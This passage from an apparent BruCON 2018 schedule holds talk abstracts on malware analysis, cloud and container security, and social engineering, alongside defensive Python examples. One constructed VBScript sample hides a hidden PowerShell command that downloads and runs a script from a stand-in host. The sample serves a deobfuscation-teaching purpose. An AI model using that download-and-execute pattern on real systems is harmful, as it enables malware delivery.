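the workshop's code). SAMPLE below is constructed and does nothing when run."""
import re

# A VBScript string literal: quotes inside are doubled ("").
LIT = r'"(?:[^"\r\n]|"")*"'
LIT_SPLIT = re.compile('(%s)' % LIT)
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(%s)\s*$' % LIT, re.M)

# Constructed sample: WScript.Shell name reversed, URL split with a junk
# character, and the command assembled from Chr() calls.
SAMPLE = r'''
Set sh = CreateObject(StrReverse("llehS.tpircSW"))
url = "http://" & Replace("ex$ample.te$st", "$", "") & "/" & Chr(117) & Chr(112) & Chr(100) & Chr(46) & Chr(112) & Chr(115) & Chr(49)
cmd = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & " -nop -w hidden -c " & Chr(34) & "IEX (New-Object Net.WebClient).DownloadString('" & url & "')" & Chr(34)
sh.Run cmd, 0, False
'''


def unquote(lit):
    return lit[1:-1].replace('""', '"')


def quote(text):
    return '"' + text.replace('"', '""') + '"'


def chr_pass(src):
    """Chr(110) / ChrW(110) -> "n" (a Chr(34) becomes the escaped literal "")."""
    return re.sub(r'\bChr[WB]?\((\d+)\)', lambda m: quote(chr(int(m.group(1)))), src, flags=re.I)


def strreverse_pass(src):
    return re.sub(r'\bStrReverse\((%s)\)' % LIT,
                  lambda m: quote(unquote(m.group(1))[::-1]), src, flags=re.I)


def replace_pass(src):
    """Replace("a$b", "$", "") -> "ab" (all three arguments must be constants)."""
    pat = r'\bReplace\((%s)\s*,\s*(%s)\s*,\s*(%s)\)' % (LIT, LIT, LIT)
    return re.sub(pat, lambda m: quote(unquote(m.group(1)).replace(
        unquote(m.group(2)), unquote(m.group(3)))), src, flags=re.I)


def concat_pass(src):
    """Fold "a" & "b" into "ab" until no adjacent literal pair remains."""
    pat = re.compile(r'(%s)\s*&\s*(%s)' % (LIT, LIT))
    prev = None
    while prev != src:
        prev, src = src, pat.sub(lambda m: quote(unquote(m.group(1)) + unquote(m.group(2))), src)
    return src


def propagate_pass(src):
    """Substitute variables that hold a constant string into later uses,
    touching only code outside string literals."""
    for name, lit in ASSIGN.findall(src):
        use = re.compile(r'(?<![\w.])%s\b(?!\s*=)' % re.escape(name))
        parts = LIT_SPLIT.split(src)
        for i in range(0, len(parts), 2):  # even indices are code, odd are literals
            parts[i] = use.sub(lambda m, lit=lit: lit, parts[i])
        src = ''.join(parts)
    return src


def deobfuscate(src):
    """Run all passes to a fixpoint; each pass may make the next one applicable."""
    passes = (chr_pass, strreverse_pass, replace_pass, concat_pass, propagate_pass)
    prev = None
    while prev != src:
        prev = src
        for p in passes:
            src = p(src)
    return src


def triage(src):
    """Deobfuscate and pull out what an analyst wants first: COM objects,
    URLs and the commands handed to WScript.Shell."""
    clean = deobfuscate(src)
    return {
        'objects': [unquote(l) for l in re.findall(r'CreateObject\((%s)\)' % LIT, clean, re.I)],
        'urls': sorted(set(re.findall(r'''https?://[^\s"'()]+''', clean))),
        'run_commands': [unquote(l) for l in re.findall(r'\.(?:Run|Exec)\s+(%s)' % LIT, clean, re.I)],
        'script': clean,
    }


if __name__ == '__main__':
    result = triage(SAMPLE)
    print(result['script'])
    for key in ('objects', 'urls', 'run_commands'):
        print(key, result[key])
```

Each pass only rewrites constructs whose arguments are already constant, so the fixpoint loop is what makes nested layers fall: `Chr()` calls become literals, literals fold under `&`, the folded variable is propagated, and the next layer becomes constant in turn. Indicator extraction runs on the result, which is the point at which the URL and the `WScript.Shell` command become visible.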

This workshop is aimed at junior incident responders, hobby malware analysts, and general security or IT practitioners who are interested in learning more about the malware triage process. If you have no experience with malware analysis but you have a good understanding of scripting languages like VBScript and JavaScript, and you are familiar with Windows internals, you should have no problem completing the workshop.

You will be provided with a virtual machine to use during the workshop; please make sure to bring a laptop that meets the following requirements. Your laptop must have VirtualBox installed and working (VMware is not supported). Your laptop must have at least 60GB of disk space free, preferably 100GB. Your laptop must be able to mount USB storage devices. Make sure you have the appropriate dongle if you need one.

Speakers
Sergei Frankoff
Twitter: @herrcore YouTube: https://www.youtube.com/oalabs Sergei is a co-founder of Open Analysis, and volunteers as a malware researcher. When he is not reverse engineering malware Sergei is focused on building automation tools for malware analysis. Sergei is a strong believer...

Sean Wilson
Twitter: @seanmw YouTube: https://www.youtube.com/oalabs Sean is a co-founder of Open Analysis, and volunteers as a malware researcher. He splits his time between reverse engineering malware and building automation tools for incident response. He is an active contributor to open...

Thursday October 4, 2018 13:30 - 17:30
04. Orval Novotel

14:00

All Your Cloud Are Belong To Us – Hunting Compromise in Azure
MongoDB, Redis, Elastic, Hadoop, SMBv1, IIS6.0, Samba. What do they all have in common? Thousands of them were pwned. In Azure. In 2017. 

Attackers have shifted tactics, incorporated nation-state leaked tools and are leveraging ransomware to monetize their attacks. Cloud networks are prime targets; the DMZ is gone, the firewall doesn't exist and customers may not realize they've exposed insecure services to the Internet until it's too late. 

In this talk I'll discuss hunting, finding and remediating compromised customer systems in Azure - a non-trivial task with 1.59 million exposed hosts and counting. Remediating system compromise is only the first stage so we'll also cover how we applied the lessons learned to proactively secure Azure Marketplace. 

Finally, I will present research I've done into the default security configuration of Azure & AWS Marketplace images and present a call to action for teams working on Azure security offerings.

Speakers
Nate Warfield
Nate Warfield is a Senior Security Program Manager for the Microsoft Security Response Center. He spent nearly 20 years designing, building and troubleshooting enterprise & carrier-grade networks for Fortune 500 companies while simultaneously moonlighting as a Grey Hat. He learned...

Thursday October 4, 2018 14:00 - 15:00
01. Westvleteren University

15:00

Forging Trusts for Deception in Active Directory
Using Deception for defence in Active Directory is very fruitful. It makes it possible to target multiple phases of an adversary’s attack methodology. While attacking an enterprise network, adversaries generally enumerate the AD trusts. It is important for them to map the relationships and trusts between domains and forests as it helps in lateral movement and post exploitation. 

This talk discusses forging and implanting computers, domain and forest objects in an AD environment. Such objects target the attacker mind-set and methodology by providing easy yet high value targets. We will see how this deception technique traps an adversary across an enterprise attack cycle. 

Open source scripts for deployment of discussed techniques will also be discussed during the talk. The talk will be full of live demonstrations. 

Speakers
Nikhil Mittal
Nikhil Mittal is a hacker, infosec researcher, speaker and enthusiast. His area of interest includes red teaming, active directory, attack research, defense strategies and post exploitation research. He has 9+ years of experience in red teaming. He specializes in assessing security...

Thursday October 4, 2018 15:00 - 16:00
01. Westvleteren University

15:45

A goldmine within an ocean of data – basics of network forensics
/!\ Important Notice /!\

For the workshop, participants are requested to download the SOF-ELK virtual machine.
You can find the VM at the following address:  https://github.com/philhagen/sof-elk/blob/master/VM_README.md

Please have the VM ready to use for the workshop.
Thank you!
-------------------------------------------------------------------------------------------------------------------------------------

Loads of data passes over a corporate network. Finding useful things in this stream can be overwhelming. This workshop will give a brief introduction on how you can capture this data. Next we'll tackle the main focus of this workshop: handling the huge load of data with mostly Free and Open Source Software. To finish, we'll tackle the subject of automating the process.

Speakers
Andy Deweirt
I’m a security consultant with over 10 years of experience in infosecurity. I've built firewalls, architected solutions, tested security, broken infrastructure and built SOC capabilities. A main thread within the multiple roles and assignments has mostly been network security. As...

Thursday October 4, 2018 15:45 - 17:45
06. Rochefort Novotel

16:00

Coffee Break
Thursday October 4, 2018 16:00 - 16:30
00. Lounge University

16:30

Disrupting the Kill Chain
Disrupting the Kill Chain is a defender’s approach to minimizing cyber-adversary access and success in a Windows environment. It builds upon my previous work on ‘Defending a Microsoft Environment at scale’, which spoke to the innovations made in Windows 10 and the capabilities of a native Microsoft stack to launch a capable defense against most vulnerability classes. This talk is a bluebook of the most effective and efficient controls in Windows 10 and an associated Microsoft environment to disrupt the kill chain. 

This talk focuses on leveraging capabilities of a Microsoft stack to launch a capable defense against most vulnerability classes. It starts out by describing the Lockheed Martin kill chain in conjunction with the MITRE ATT&CK framework and explains how we have used it to build a defense model. We then delve into specific capabilities of the Windows subsystem to detect and respond to the various stages of an attack lifecycle, including: Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Execution, Collection, Exfiltration and Command and Control (C2). 

As we continue, we describe a working defense model that delves into some of the more effective and efficient controls in a Windows 10 ecosystem that address several categories of attacks. These higher-efficiency controls are detailed in a few sample deployment guides that are made available on GitHub and based upon a “single platform approach” I’ve previously described in my other talks. We then talk about the different ways in which logging and monitoring data can be collected and analyzed at scale. We talk about implementations that extrapolate the telemetry from these indicators across Microsoft Windows to an enterprise view that reduces noise and improves signal. In order to do this, we explain how WEF (Windows Event Forwarding) works, present a sample Sysmon deployment guide, show how to collect rich event metadata from all Windows Event Log sources to build correlation, and finally cover the more recent technique of log collection and hunting using Windows Defender telemetry data. We don’t address the traditional SIEM implementations but talk about specific use cases that address the MITRE ATT&CK framework. (Samples of such an approach are visible in my previous talks detailed here between Pages 16-25). 

During the second half of the talk, we delve into some of the automated remediation and incident response capabilities built into the Windows Defender ATP product and how it can be used for hands-free triage and remediation through the use of automation playbooks (Hexadite). We cover scenarios from basic malware hunting techniques such as frequency analysis, process trees and other indicators that may indicate suspicious behaviors. 

In closing, we round up the topics covered, provide some disclaimers that this is not a silver bullet to all attacks and simply reinforce the message that basic hygiene and a handful of properly implemented controls are indeed effective in disrupting the kill chain.

Speakers
Vineet Bhatia
Vineet Bhatia (@ThreatHunting) runs cybersecurity operations. His work focuses on digital forensics, threat hunting and aviation cybersecurity.

Thursday October 4, 2018 16:30 - 17:30
01. Westvleteren University

17:30

Hunting Android Malware: A novel runtime technique for identifying malicious applications
In this research, we propose a novel technique to identify malicious Android applications through the use of analyzing the HEAP of Android applications at runtime. 

Android malware is a continuing problem in the Android ecosystem, even after 8 major Android releases. Android currently relies on implicit and explicit user participation to identify malicious applications, both on the Play Store and on devices. Currently multiple techniques exist to identify malware, such as code signatures, hashes, permission analysis and manual static analysis. These techniques rely on the premise that whoever or whatever performs the analysis has access to the Android application (APK). However, performing these analysis techniques on devices is resource intensive, time consuming and dependent on access to the APK. 

What if no access to the APK is required to identify if an application is malicious? Currently no capability exists to scan for malicious applications at runtime on Android devices; at best there is static analysis on the application and its permissions. Additionally there is the Android Attestation framework, which attempts to provide information on the state of the device but does not provide information on the state of running applications. 

In this research, we propose a novel technique to identify malicious Android applications through the use of analyzing the HEAP of Android applications at runtime. The technique proposed does not require access to the contents of the APK nor does it require write access to the application sandbox or memory, only read access to the process HEAP. The analysis of the HEAP allows the proposed technique to identify the instantiated objects for a particular application. The identification and analysis of instantiated objects for Android applications can be used to effectively identify applications that are making use of, and implementing, dangerous functionality such as DexClass loaders and other well known objects that exhibit malicious behaviour. 

The results of this research are showcased as a PoC, which shows how the technique can be bundled into the Android ecosystem as part of the Android Attestation Framework. The inclusion of this research as a system service via the Attestation Framework can enable the Android operating system or user to identify malicious applications at runtime via any Android application.

Speakers
Christopher Le Roy
Chris is a security researcher based in London. He has not had an unusual entrance to infosec, coming from a Computer Science background which led him to dabble in software development for some time. This resulted in Chris realising he is a terrible dev and prefers breaking things, which...

Thursday October 4, 2018 17:30 - 18:30
01. Westvleteren University

21:30

BruCON Party
Join us at the BruCON party on Thursday (2018-10-04) evening!

Location: Le bateau. Muinkkaai 1, 9000 Ghent

Note: This is a boat, a real one!




Thursday October 4, 2018 21:30 - 23:59
BruCON Party Muinkkaai 1, 9000 Gent, Belgium
 
Friday, October 5
 

07:30

Hacker Run (10K)
What better way is there to start the second conference day than running 10km with a bunch of hackers?

Put on your running shoes and join us at the entrance of the Novotel (workshop venue) on Friday at 7:30.

We’ll be back in time to freshen up and attend the first presentation of the day.

Word is that it’s also a good way to get rid of a hangover!

Friday October 5, 2018 07:30 - 08:30
Novotel Novotel Ghent

08:30

Registration & Breakfast
Friday October 5, 2018 08:30 - 10:00
00. Lounge University

10:00

Keynote - 5.256e+6 minutes in a decade
There are 5.256e+6 minutes in a decade, and in all of those minutes a lot has changed since BruCON first started. This keynote puts on the rose-tinted glasses and delves into some of the more pressing issues we've faced over the past decade and tries to understand whether we are getting better, or whether things are still the same.

Speakers
Daniel Cuthbert
Daniel Cuthbert is the Global Head of Cyber Security Research for Grupo Santander. With a career spanning over 20+ years on both the offensive and defensive side, he’s seen the evolution of hacking from small groups of curious minds to organised criminal networks and nation state...

Friday October 5, 2018 10:00 - 11:00
01. Westvleteren University

10:00

ICS and IoT Village
Friday October 5, 2018 10:00 - 18:00
02. Westmalle University

10:30

A goldmine within an ocean of data – basics of network forensics
/!\ Important Notice /!\

For the workshop, participants are requested to download the SOF-ELK virtual machine.
You can find the VM at the following address:  https://github.com/philhagen/sof-elk/blob/master/VM_README.md

Please have the VM ready to use for the workshop.
Thank you!
-------------------------------------------------------------------------------------------------------------------------------------

Loads of data passes over a corporate network. Finding useful things in this stream can be overwhelming. This workshop will give a brief introduction on how you can capture this data. Next we'll tackle the main focus of this workshop: handling the huge load of data with mostly Free and Open Source Software. To finish, we'll tackle the subject of automating the process.

Speakers
Andy Deweirt
I’m a security consultant with over 10 years of experience in infosecurity. I've built firewalls, architected solutions, tested security, broken infrastructure and built SOC capabilities. A main thread within the multiple roles and assignments has mostly been network security. As...

Friday October 5, 2018 10:30 - 12:30
03. Chimay Novotel

10:30

Finding security vulnerabilities with modern fuzzing techniques (Short Version)
Fuzzing is a very powerful technique to detect flaws and vulnerabilities in software. The aim of this hands-on workshop is to demonstrate different techniques which can be used to fuzz applications or libraries. Choosing the correct and most effective fuzzing technique will be discussed with real-world examples. Moreover, hints on common problems and pitfalls during fuzzing will be given. After discussing the theory behind modern fuzzing techniques we look at famous fuzzers and how they can be used to find real-world vulnerabilities. In the second part, important areas which influence the fuzzing results are covered. Moreover, we discuss differences between fuzzing open-source and closed-source applications and useful reverse engineering techniques which assist the fuzzing process.

Speakers
Rene Freingruber
Senior Security Consultant, SEC Consult
René Freingruber has been working as a professional security consultant for SEC Consult for several years. He conducts research in the fields of malware analysis, reverse engineering, fuzzing and exploit development. For his bachelor thesis he studied modern mitigation techniques...

Friday October 5, 2018 10:30 - 12:30
06. Rochefort Novotel

10:30

ICS Forensic Workshop
You are an incident responder working for a nuclear waste management system. An incident has taken place in the industrial environment where a number of valves for the main waste storage tank are sporadically opening and closing. The valves are controlled by a PLC, and the local security operations centre (SOC) suspects that it may be due to an attack against the PLC. You are provided a network pcap file and a dump of the data blocks from the PLC for analysis. You are expected to analyse the data to attempt to determine what occurred and how the behaviour of the valve has been modified.

Speakers
Joe Stirland
Joe Stirland is a senior scientist and technical Lead for the Airbus DTO – ZSCA Cyber Forensics lab and is responsible for state of the art research within the cyber forensics field in support of Airbus (Airbus, Airbus Helicopters, Airbus Defence & Space, and Airbus HQ). He holds...

Friday October 5, 2018 10:30 - 12:30
05. La Trappe Novotel

10:30

Jedi tricks to convince your boss (Episode 2)
The 2017 Global Information Security Workforce Study showed that communication skills are the most wanted competences, sought by 66% of hiring managers, while only 25% of security professionals put these skills on their development track.
Today, in most organizations, it is unlikely you will be able to improve your company's security if you're not able to convince people to move in the right direction. Assertiveness

Speakers
Emmanuel Nicaise
Emmanuel Nicaise has 25 years of experience in IT, amongst which about 19 in security. With a degree in IT and a master’s in clinical psychology, he’s naturally focusing on human-centric security management and on the different ways to foster a better security culture in organizations...

Friday October 5, 2018 10:30 - 12:30
04. Orval Novotel

11:00

Exploits in Wetware
Robert discusses his third place experience at the Defcon 2017 SE CTF and how his efforts clearly show how easy it is to get sensitive information from any organization. The 2017 Verizon report clearly shows the dramatic growth rate of social engineering attacks and Robert demonstrates how he collected hundreds of data points from the target organization using OSINT techniques. He then goes into the vishing strategy he implemented to maximize the points he collected in the 20 minute live contest. Without much effort Robert was able to know their VPN, OS, patch level, executive personal cell phone numbers and place of residence. 
Robert lifts the curtain of the social engineering world by showing tricks of the trade such as the “incorrect confirmation”, which is one of many methods to loosen the tongues of his marks. Robert then shows the pretexts he designed to attack companies and the emotional response each pretext is designed to trigger. By knowing these patterns we can better educate our staff. 
With that much information at his fingertips, how long would it take him to convince your executive to make a bank transfer? If your organization lost a few million dollars due to social engineering, who would be to blame? Are you insured for that? Who is getting fired? 
Robert wraps up his talk with a series of strategies companies can take to reduce exposure and risk. He goes over current exposure, building defenses, getting on the offense and finally… a culture shift. 

Speakers
Robert Sell
Robert is a Senior IT Manager in the aerospace industry where he spends most of his time managing InfoSec teams. While his teams focus on the traditional blue/red team exercises, lately he has spent an increasing amount of time building defenses against social engineering. Robert...

Friday October 5, 2018 11:00 - 12:00
01. Westvleteren University

11:00

Operator Jail Breakout
Operator stations are today one of the first systems/stations to interact with a distributed control system (DCS) or other industrial control systems. These operator stations often have some protection built in to restrict what the operator can do within the SCADA software and/or on the operating system itself.

Within this presentation, some of the most (easily) discovered ways are shown/explained and how these can be (ab)used to gain a further foothold within the environment.

The audience will learn more about the shortcomings of most operator jail solutions and what could be done to step up this game and secure them properly. The key takeaway for the audience is that you cannot trust an operator jail to keep attackers from gaining access to the underlying operating system and thus potentially exploiting the whole DCS environment.

Speakers
Frank Lycops
Frank is a freelance security consultant and researcher. He has 8 years of experience in both IT and OT environments. During his work, he performed numerous penetration tests on OT environments, helped improve the overall security of various environments and discovered several...

Dieter Sarrazyn
Dieter is a freelance OT security expert who has worked extensively on industrial control system security, including more than 10 years in a large electricity generation company. He performs SCADA security assessments, provides assistance in securing SCADA environments and helps customers...

Friday October 5, 2018 11:00 - 12:00
02. Westmalle University

12:00

Outside the Box: Breakouts and Privilege Escalation in Container Environments
Containers have quickly become a standard feature of most application and infrastructure stacks. The benefits of containers are numerous, with ease of use being a primary motivator. This has seen adoption by numerous cloud service providers. Application containers are expected to be a $2.7bn market by 2020[1]. The most popular container solution, Docker, has had 14 million hosts accessing their public Docker Hub, pulling down 12 billion container images[2]. At least 40% of organizations using Docker are also using a container orchestration service such as Kubernetes, Mesos, Amazon ECS, or Google Container Engine[3]. 

Escaping these container solutions is seen as a hard problem, requiring kernel vulnerabilities, bespoke ROP chains, or framework flaws. This is not the case! In this talk we will explore, from an attacker's perspective, real-world exploitable setups we've encountered. We will demonstrate numerous container escapes, including exposed Docker daemons and Kubernetes API access in multi-tenant environments, weak Linux capability blacklists and seccomp bypasses. These are not theoretical vulnerabilities or contrived lab examples, but actual misconfigurations we've seen in large cloud service providers. 

Many container operators and developers don't understand the implication of certain configurations and the attack surface presented by the confluence of the container technology's surface area and Linux kernel and other subsystem interactions. Secure design and configuration of a container environment requires a deep understanding of Unix sockets, networking, namespaces, and an equally deep understanding of container RPC and orchestration endpoints. Small, easy to overlook missteps like using the wrong network namespace or exporting the wrong port, or overlooking one of the hundreds of Linux syscalls can have disastrous results. 

The talk will provide a methodology that security professionals can use when assessing containerized environments and we will demonstrate attacks against common deployments. We will also cover configuration recommendations for engineers to avoid these mistakes and tools you can use to check for a safe configuration. 
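
As an added example of the "check for a safe configuration" step (written for this page; it is not the speakers' tooling), here is a Python audit of container settings in the layout `docker inspect` prints: effective capabilities computed from the default set plus `CapAdd` minus `CapDrop`, seccomp and AppArmor opt-outs, host namespaces, sensitive host paths mounted in, and the user the container runs as. The "dangerous capability" set and the sample records are assumptions made for the example; the Docker default capability list is the one documented at the time.

```python
"""Static audit of container runtime settings (added example, not the speakers'
tooling). Input dicts mimic the layout of `docker inspect` output; the two
sample containers below are constructed."""
import json

# Capabilities a Docker container gets by default (runtime default list as documented).
DOCKER_DEFAULT_CAPS = {
    'CHOWN', 'DAC_OVERRIDE', 'FSETID', 'FOWNER', 'MKNOD', 'NET_RAW', 'SETGID',
    'SETUID', 'SETFCAP', 'SETPCAP', 'NET_BIND_SERVICE', 'SYS_CHROOT', 'KILL',
    'AUDIT_WRITE',
}
# Assumed "escape-relevant" set for this example: each gives a route towards the
# host (mounting, ptrace of host processes, module loading, raw device access).
DANGEROUS_CAPS = {'SYS_ADMIN', 'SYS_PTRACE', 'SYS_MODULE', 'DAC_READ_SEARCH',
                  'NET_ADMIN', 'SYS_RAWIO'}
SENSITIVE_HOST_PATHS = {'/', '/var/run/docker.sock', '/run/docker.sock',
                        '/proc', '/sys', '/dev', '/etc', '/root'}


def _caps(names):
    return {n.upper().replace('CAP_', '') for n in (names or [])}


def effective_caps(host_cfg):
    """Default set minus CapDrop plus CapAdd; 'ALL' is honoured on both sides."""
    add, drop = _caps(host_cfg.get('CapAdd')), _caps(host_cfg.get('CapDrop'))
    if 'ALL' in add:
        return DOCKER_DEFAULT_CAPS | DANGEROUS_CAPS
    caps = set() if 'ALL' in drop else DOCKER_DEFAULT_CAPS - drop
    return caps | add


def audit(container):
    """Return a sorted list of finding identifiers for one inspect record."""
    host, cfg = container.get('HostConfig', {}), container.get('Config', {})
    findings = []
    if host.get('Privileged'):
        findings.append('privileged')  # all caps, all devices, no seccomp/AppArmor
    else:
        for cap in sorted(effective_caps(host) & DANGEROUS_CAPS):
            findings.append('dangerous_capability:' + cap)
    opts = [o.lower() for o in (host.get('SecurityOpt') or [])]
    if 'seccomp=unconfined' in opts:
        findings.append('seccomp_unconfined')
    if 'apparmor=unconfined' in opts:
        findings.append('apparmor_unconfined')
    if not any(o.startswith('no-new-privileges') for o in opts):
        findings.append('no_new_privileges_missing')
    for mode, name in (('PidMode', 'host_pid_namespace'),
                       ('NetworkMode', 'host_network_namespace'),
                       ('IpcMode', 'host_ipc_namespace')):
        if host.get(mode) == 'host':
            findings.append(name)
    sources = [b.split(':')[0] for b in (host.get('Binds') or [])]
    sources += [m.get('Source', '') for m in (container.get('Mounts') or [])]
    for src in sources:
        norm = src.rstrip('/') or '/'
        if norm in SENSITIVE_HOST_PATHS:
            findings.append('sensitive_mount:' + norm)
    user = str(cfg.get('User') or '')
    if user in ('', '0', 'root') or user.startswith('0:'):
        findings.append('runs_as_root')
    return sorted(set(findings))


def audit_inspect_json(text):
    """`docker inspect` prints a JSON array; audit each record."""
    return {c.get('Name', '?'): audit(c) for c in json.loads(text)}


# Constructed records, trimmed to the fields the audit reads.
WEAK = {
    'Name': '/webapp-weak',
    'Config': {'User': ''},
    'HostConfig': {'Privileged': False, 'CapAdd': ['SYS_ADMIN', 'NET_ADMIN'],
                   'CapDrop': ['MKNOD'],  # blacklist style: drops one, keeps the rest
                   'SecurityOpt': ['seccomp=unconfined'],
                   'PidMode': 'host', 'NetworkMode': 'bridge',
                   'Binds': ['/var/run/docker.sock:/var/run/docker.sock', '/data:/data:ro']},
    'Mounts': [],
}
HARDENED = {
    'Name': '/webapp-hardened',
    'Config': {'User': '10001:10001'},
    'HostConfig': {'Privileged': False, 'CapAdd': ['NET_BIND_SERVICE'],
                   'CapDrop': ['ALL'],  # allowlist style: drop everything, add back what is needed
                   'SecurityOpt': ['no-new-privileges:true'],
                   'PidMode': '', 'NetworkMode': 'bridge',
                   'Binds': ['/data:/data:ro']},
    'Mounts': [],
}

if __name__ == '__main__':
    for name, found in audit_inspect_json(json.dumps([WEAK, HARDENED])).items():
        print(name, found or 'no findings')
```

Pipe the output of `docker inspect <container>` into `audit_inspect_json()`. The two constructed records show the difference between a blacklist (`CapDrop: ['MKNOD']`, which still leaves `SYS_ADMIN` reachable through `CapAdd`) and an allowlist (`CapDrop: ['ALL']` plus the one capability actually needed), which is the weak-blacklist issue the abstract refers to.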

Speakers
Craig Ingram
Craig is a Principal Platform Security Engineer at Salesforce with over 12 years of experience working in the security industry. At Salesforce Craig is hands-on with secure SDL/DevOps implementation and automation, penetration testing, and security research including reverse engineering...

Etienne Stalmans
Etienne is a member of the Public Cloud Security Group at Salesforce, and a security researcher with a keen interest in protocol reversing and finding ways to abuse functionality in everyday products. He completed an MSc in Network Security, focusing on Botnets and DNS. He has spoken...

Friday October 5, 2018 12:00 - 13:00
01. Westvleteren University

13:00

Lunch
Friday October 5, 2018 13:00 - 14:00
00. Lounge University

13:30

The story of greendale
Ever wanted to do forensics and feel good about it? This workshop will introduce you to a suite of open-source tools for all things digital forensics and incident response. You will see how Greendale (a fictitious but very famous university) used this set of tools to articulate an effective response to a pretty severe incident last summer—all on a state-financed university budget! We will cover collection of forensic evidence with GRR, processing with Plaso, and analysis with Timesketch; how these tools can be articulated using dftimewolf, how to remotely image disks and have the processing done in the Cloud.

Speakers
Thomas Chopitea
Thomas is a forensics investigator and engineer at Google. He focuses on digital forensics, incident response, and building the bricks that make his team’s investigation and response process as smooth and efficient as possible. His long-term professional goal is to automate himself...

Daniel White
Daniel White is a security engineer at Google and the tech lead for the Plaso project. He is focused on keeping people and data safe. He works on forensics, incident response and tool development.

Friday October 5, 2018 13:30 - 16:30
03. Chimay Novotel

13:30

Active Directory Redteaming : Attacking the backbone of Enterprise environments
This workshop covers attacking an Active Directory environment using built-in tools like PowerShell and other MS-signed binaries. Using the assume-breach methodology, we start as a normal user in the domain and silently work our way up to the highest privileges at the enterprise level.

We will focus on not touching disk, abusing functionality and evading detection mechanisms, while still achieving true domain dominance.

Speakers
Nikhil Mittal
Nikhil Mittal is a hacker, infosec researcher, speaker and enthusiast. His area of interest includes red teaming, active directory, attack research, defense strategies and post exploitation research. He has 9+ years of experience in red teaming. He specializes in assessing security...

Friday October 5, 2018 13:30 - 17:30
05. La Trappe Novotel

13:30

The hunt is on: Engineering the NextGen Cyber Threat Detection System. Attackers, it’s not so easy to hide anymore!
The cyber attack landscape has changed. Malicious adversaries continue to enhance the techniques used to exploit enterprise networks. A key ingredient missing for our cyber experts is a better way to hunt for adversarial presence. The purpose of this talk is to show how to engineer a brand new Cyber Threat Intelligence Detection System (CTDS) and release two new frameworks, Excalibur TIE Mark I and Themis Network Analyzer, that give investigators a better way to hunt for new threats in real time. This technical talk dives straight in to show how to engineer the intelligence engine and create autonomous network sensors that extract and analyze thousands of artifacts, both from each host machine and directly from the enterprise network. This system derives real indicators of compromise (IOCs) from large data sets and then applies these IOCs to better protect your enterprise network from new attacks.

Novel approaches are presented, with the algorithms used to analyze, correlate and produce IOCs, allowing the investigator to better hunt for new threats, populate uniform data sets suited to information dissemination and analysis, and create new visualization graphs that let a human derive meaning from vast amounts of aggregated data. Finally, this talk applies everything we've learned and shows how to create new distributed network sensors and deploy the IOCs discovered by the Threat Intelligence Engine to better protect the enterprise network. Rest assured, lots of live demos are included. And of course, this talk comes with a new open-source tool release for the community to use!

Attacks of tomorrow will no longer be as effective if we have the right tools to better hunt for the adversary.  This involves a new set of thinking.  Threat Intelligence will be the next paradigm in computer security.  Allow me to show you how to engineer the entire framework and deploy it on your network.
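As an added illustration (not code from the talk, nor from the Excalibur TIE or Themis tooling it announces), here is one common way host and network artifacts become IOC candidates: stack each artifact across the fleet, keep only the rare ones, and promote a rare host artifact to an indicator only when a rare network artifact lines up with the same set of machines. The six-host fleet, the hashes, the scheduled-task name and the domains are constructed sample data, and the prevalence threshold is an assumption.

```python
"""Prevalence-based IOC derivation across a fleet (added example; constructed data)."""
from collections import defaultdict
from typing import Dict, FrozenSet, List, Tuple

Record = Tuple[str, str, str]   # (host, artifact_type, value)
Key = Tuple[str, str]           # (artifact_type, value)

# Constructed six-host fleet; none of these hashes, names or domains is real.
FLEET = ["ws01", "ws02", "ws03", "ws04", "ws05", "ws06"]

HOST_ARTIFACTS: List[Record] = (
    [(h, "sha256", "1f" * 32) for h in FLEET]          # baseline autorun on every host
    + [(h, "sha256", "2e" * 32) for h in FLEET[:5]]    # legitimate agent on most hosts
    + [("ws03", "sha256", "de" * 32),                  # odd autorun binary on two hosts
       ("ws04", "sha256", "de" * 32),
       ("ws03", "schtask", r"\Microsoft\Windows\UpdateSvcHelper"),
       ("ws04", "schtask", r"\Microsoft\Windows\UpdateSvcHelper")]
)

NETWORK_ARTIFACTS: List[Record] = (
    [(h, "dns", "updates.example.com") for h in FLEET]
    + [("ws03", "dns", "cdn-edge-7.example.net"),
       ("ws04", "dns", "cdn-edge-7.example.net"),
       ("ws05", "dns", "mail.example.com")]            # rare but unrelated: stays noise
)


def prevalence(records: List[Record]) -> Dict[Key, FrozenSet[str]]:
    """Map each (type, value) artifact to the set of hosts it was seen on."""
    seen = defaultdict(set)
    for host, kind, value in records:
        seen[(kind, value)].add(host)
    return {k: frozenset(v) for k, v in seen.items()}


def rare_artifacts(records: List[Record], fleet_size: int,
                   max_ratio: float = 0.34) -> Dict[Key, FrozenSet[str]]:
    """Least-frequency-of-occurrence: keep artifacts present on at most
    max_ratio of the fleet (assumed threshold). Fleet-wide items are baseline."""
    return {k: hosts for k, hosts in prevalence(records).items()
            if len(hosts) / fleet_size <= max_ratio}


def correlate(host_rare: Dict[Key, FrozenSet[str]],
              net_rare: Dict[Key, FrozenSet[str]],
              min_jaccard: float = 1.0) -> List[dict]:
    """Promote a rare host artifact to an IOC only when a rare network
    artifact was observed on the same set of machines."""
    iocs = []
    for hkey, hhosts in host_rare.items():
        for nkey, nhosts in net_rare.items():
            inter, union = hhosts & nhosts, hhosts | nhosts
            if inter and len(inter) / len(union) >= min_jaccard:
                iocs.append({"host_artifact": hkey, "network_artifact": nkey,
                             "hosts": sorted(union)})
    return iocs


def build_iocs(host_records: List[Record], net_records: List[Record],
               fleet_size: int) -> List[dict]:
    """Stack host and network artifacts separately, then correlate the rare ones."""
    return correlate(rare_artifacts(host_records, fleet_size),
                     rare_artifacts(net_records, fleet_size))


def indicator_values(iocs: List[dict]) -> List[str]:
    """Flat, de-duplicated indicator list ready to push to the network sensors."""
    values = {ioc["host_artifact"][1] for ioc in iocs}
    values |= {ioc["network_artifact"][1] for ioc in iocs}
    return sorted(values)


if __name__ == "__main__":
    found = build_iocs(HOST_ARTIFACTS, NETWORK_ARTIFACTS, len(FLEET))
    for ioc in found:
        print(ioc)
    print("deploy:", indicator_values(found))
```

On this data the lone `mail.example.com` lookup from ws05 is rare but never becomes an indicator, because no rare host artifact shares its host set; the odd autorun hash, the scheduled task and the `cdn-edge-7` domain on ws03/ws04 do line up and come out as two linked IOCs.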

Speakers
Solomon Sonya

